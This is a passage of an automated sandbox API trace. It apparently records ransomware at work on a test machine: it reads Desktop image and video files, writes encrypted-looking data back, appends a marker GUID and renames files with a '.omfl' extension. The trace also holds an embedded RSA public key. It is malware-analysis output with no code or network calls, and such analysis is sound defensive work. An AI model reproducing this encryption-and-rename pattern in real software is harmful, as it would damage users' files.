(HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c20 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8d0 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cdb88 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa900 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16bf0 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8f0 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16968 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e98 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8e0 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16a40 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e98 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd167e8 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c38 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16a40 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd167e8 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0xdcfa8b0 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e58 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cf128 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8b0 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1c) returned 0xdce9278 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c08 | out: hHeap=0x4970000) returned 1 [0130.514] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c08 [0130.514] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa890 | out: hHeap=0x4970000) returned 1 [0130.515] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x204) returned 0xdd20488 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16848 | out: hHeap=0x4970000) returned 1 [0130.515] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x75038a0 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16a40 | out: hHeap=0x4970000) returned 1 [0130.515] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x210) returned 0xdce0a50 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.515] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10c) returned 0x74e3210 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8c0 | out: hHeap=0x4970000) returned 1 [0130.515] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x108) returned 0x7503788 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c08 | out: hHeap=0x4970000) returned 1 [0130.515] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x200) returned 0xdcfc0b8 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x75038a0 | out: hHeap=0x4970000) returned 1 [0130.515] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24680 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d3088 | out: hHeap=0x4970000) returned 1 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24788 | out: hHeap=0x4970000) returned 1 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24680 | out: hHeap=0x4970000) returned 1 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf128 | out: hHeap=0x4970000) returned 1 [0130.515] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503788 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce0a50 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfc0b8 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa860 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c38 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcfa8a0 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdb88 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c20 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bf0 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd17560 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16bd8 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2ff8 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24368 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.516] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.516] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd2c688*, nNumberOfBytesToWrite=0x1445b, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd2c688*, lpNumberOfBytesWritten=0xe00fb14*=0x1445b, lpOverlapped=0x0) returned 1 [0130.517] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0130.517] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x14460, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.517] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.517] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.517] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5f60 [0130.517] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0x757b558 [0130.517] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x757b558, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0130.517] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0xdd19550 [0130.518] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b558 | out: hHeap=0x4970000) returned 1 [0130.518] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5f60 | out: hHeap=0x4970000) returned 1 [0130.518] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd19550*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd19550*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0130.518] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0130.518] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.518] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0130.518] CloseHandle (hObject=0x5c8) returned 1 [0130.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x70) returned 0x74d2d70 [0130.520] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x880) returned 0xdd29950 [0130.520] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74d2d70 | out: hHeap=0x4970000) returned 1 [0130.520] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IG-g CeobDS.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ig-g ceobds.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\IG-g CeobDS.jpg.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ig-g ceobds.jpg.omfl")) returned 1 [0130.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0130.521] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.521] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf9d98 | out: hHeap=0x4970000) returned 1 [0130.523] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4f168270, ftCreationTime.dwHighDateTime=0x1d5db8b, ftLastAccessTime.dwLowDateTime=0xd34dfc30, ftLastAccessTime.dwHighDateTime=0x1d5e095, ftLastWriteTime.dwLowDateTime=0xd34dfc30, ftLastWriteTime.dwHighDateTime=0x1d5e095, nFileSizeHigh=0x0, nFileSizeLow=0x4082, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mshFbWn-Fh.avi", cAlternateFileName="MSHFBW~1.AVI")) returned 1 [0130.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x50) returned 0x757c9b0 [0130.523] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x76) returned 0xdcf9d98 [0130.523] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c9b0 | out: hHeap=0x4970000) returned 1 [0130.523] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mshFbWn-Fh.avi") returned=".avi" [0130.523] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\mshFbWn-Fh.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\mshfbwn-fh.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0130.523] GetFileSizeEx (in: hFile=0x5c8, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=16514) returned 1 [0130.523] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0130.526] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x405c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.526] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0130.527] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.527] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.527] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.527] ReadFile (in: hFile=0x5c8, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x4082, lpOverlapped=0x0) returned 1 [0130.527] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.528] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1ef) returned 0xdd0bd00 [0130.528] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.528] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0130.528] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3088) returned 1 [0130.529] CryptCreateHash (in: hProv=0x49d3088, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0130.529] CryptHashData (hHash=0xdce3a70, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0130.529] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0130.529] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x11) returned 0x74cdf28 [0130.529] CryptGetHashParam (in: hHash=0xdce3a70, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0130.529] GetLastError () returned 0x0 [0130.529] CryptDestroyHash (hHash=0xdce3a70) returned 1 [0130.529] CryptReleaseContext (hProv=0x49d3088, dwFlags=0x0) returned 1 [0130.529] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0130.529] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0130.529] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0130.529] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.529] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0130.529] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb98 | out: hHeap=0x4970000) returned 1 [0130.529] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb98 [0130.529] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4080) returned 0xdd2c688 [0130.529] SetFilePointer (in: hFile=0x5c8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0130.530] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0xdd0bd00 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x30) returned 0x750cb60 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x1f0) returned 0x74e4b90 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08de8 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2ff8 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16bd8 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf3040 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16bf0 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c20 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16c38 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x24) returned 0xdd0d930 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x158) returned 0xdd27968 [0130.530] RtlReAllocateHeap (Heap=0x4970000, Flags=0x0, Ptr=0xdd27968, Size=0x218) returned 0xdd20488 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x558) returned 0xdce69c8 [0130.530] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c20 | out: hHeap=0x4970000) returned 1 [0130.530] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c38 | out: hHeap=0x4970000) returned 1 [0130.530] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.530] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0d930 | out: hHeap=0x4970000) returned 1 [0130.530] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce69c8 | out: hHeap=0x4970000) returned 1 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc) returned 0xdd16968 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e38 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10) returned 0xdd16c38 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x18) returned 0x74cf068 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x9) returned 0xdd16c20 [0130.530] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8) returned 0x7481e78 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x10e) returned 0x74e3210 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9278 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x58) returned 0xdd08cc8 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdf28 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x104) returned 0x7503670 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x14) returned 0x74cdb88 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e58 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c38 | out: hHeap=0x4970000) returned 1 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e78 | out: hHeap=0x4970000) returned 1 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16c20 | out: hHeap=0x4970000) returned 1 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cf068 | out: hHeap=0x4970000) returned 1 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e38 | out: hHeap=0x4970000) returned 1 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd16968 | out: hHeap=0x4970000) returned 1 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9278 | out: hHeap=0x4970000) returned 1 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08de8 | out: hHeap=0x4970000) returned 1 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd20488 | out: hHeap=0x4970000) returned 1 [0130.531] GetCurrentThreadId () returned 0x618 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24260 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x82) returned 0x49d5ce0 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x2c) returned 0x750cb28 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d3088 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x148) returned 0xdd17560 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e38 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x4) returned 0x7481e78 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x100) returned 0xdd24368 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.531] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.531] GetCurrentThreadId () returned 0x618 [0130.531] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.532] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.532] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xeb) returned 0x74e3210 [0130.532] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x64) returned 0x4a464c0 [0130.532] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x4a464c0 | out: hHeap=0x4970000) returned 1 [0130.532] SetFilePointerEx (in: hFile=0x5c8, liDistanceToMove=0x4082, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0130.532] WriteFile (in: hFile=0x5c8, lpBuffer=0xdd24260*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24260*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0130.532] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24260 | out: hHeap=0x4970000) returned 1 [0130.533] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0130.533] WriteFile (in: hFile=0x5c8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, 